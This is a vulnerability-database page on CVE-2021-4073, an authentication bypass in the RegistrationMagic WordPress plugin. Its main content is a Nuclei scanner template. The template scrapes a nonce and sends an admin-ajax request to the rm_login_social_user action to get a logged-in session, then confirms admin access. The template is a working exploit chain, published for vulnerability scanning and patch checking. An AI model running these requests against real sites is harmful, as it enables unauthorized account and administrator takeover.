Lucene search
K

RegistrationMagic <= 5.0.1.7 - Authentication Bypass

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 20 Views

RegistrationMagic WordPress plugin authentication bypass enables unauthenticated logins as any user; update to fix.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2021-4073
31 Oct 202521:02
circl
CNNVD
WordPress 插件授权问题漏洞
14 Dec 202100:00
cnnvd
CNVD
WordPress RegistrationMagic plugin authorization problem vulnerability
19 Dec 202100:00
cnvd
CVE
CVE-2021-4073
14 Dec 202115:50
cve
Cvelist
CVE-2021-4073 RegistrationMagic <= 5.0.1.7 Authentication Bypass
14 Dec 202115:50
cvelist
EUVD
EUVD-2021-33966
3 Oct 202520:07
euvd
NVD
CVE-2021-4073
14 Dec 202116:15
nvd
OSV
CVE-2021-4073
14 Dec 202116:15
osv
Patchstack
WordPress RegistrationMagic plugin <= 5.0.1.7 - Authentication Bypass vulnerability
8 Dec 202100:00
patchstack
Prion
Design/Logic Flaw
14 Dec 202116:15
prion
Rows per page
id: CVE-2021-4073

info:
  name: RegistrationMagic <= 5.0.1.7 - Authentication Bypass
  author: daffainfo
  severity: critical
  description: |
    RegistrationMagic WordPress plugin versions <= 5.0.1.7 contain an authentication bypass caused by missing identity validation in social_login_using_email(), letting unauthenticated users log in as any site user, exploit requires knowing a valid username.
  impact: |
    Unauthenticated attackers can log in as any user, including administrators, potentially leading to full site compromise.
  remediation: |
    Update to the latest version of the plugin where the issue is fixed.
  reference:
    - https://www.wordfence.com/blog/2021/12/authentication-bypass-vulnerability-patched-in-user-registration-plugin/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-4073
    - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-4073
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-4073
    cwe-id: CWE-287
    epss-score: 0.07
    epss-percentile: 0.93379
    cpe: cpe:2.3:a:metagauss:registrationmagic:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: metagauss
    product: registrationmagic
    framework: wordpress
  tags: cve,cve2021,wordpress,wp,wp-plugin,metagauss,registrationmagic,auth-bypass,vkev

flow: |
  if (template.path != null) {
    http(1)
  }
  http(2)
  http(3)
  http(4)

variables:
  email: "{{randstr}}@{{rand_base(5)}}.com"

http:
  - method: GET
    path:
      - "{{BaseURL}}{{path}}"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "handle_data(", "FB.login(")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: nonce
        group: 1
        regex:
          - "handle_data.*'([0-9a-f]+)'\\);"
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "\"request_processing\":", "\"security\":", "\"hours\":")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: nonce
        group: 1
        regex:
          - '"security":"([0-9a-f]+)","hours"'
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=rm_login_social_user&email={{email}}&security={{nonce}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(header, "wordpress_logged_in_")'
          - 'contains_all(body, "\"code\":", "\"msg\":")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-admin/ HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "contains_all(body, '>Profile</div>', 'wp-admin-bar-root-default')"
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022100d16a81c294ea896c1c5cada550a7e363a19c049b3a1bf6051374eb0e958ae7d0022065d1c30d60c1ee539e84cb3de8fd5217c20009b9d41fbdb154eefc1f3ee19f02:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7High risk
Vulners AI Score7
CVSS 26.8
CVSS 3.18.1 - 9.8
EPSS0.07
SSVC
20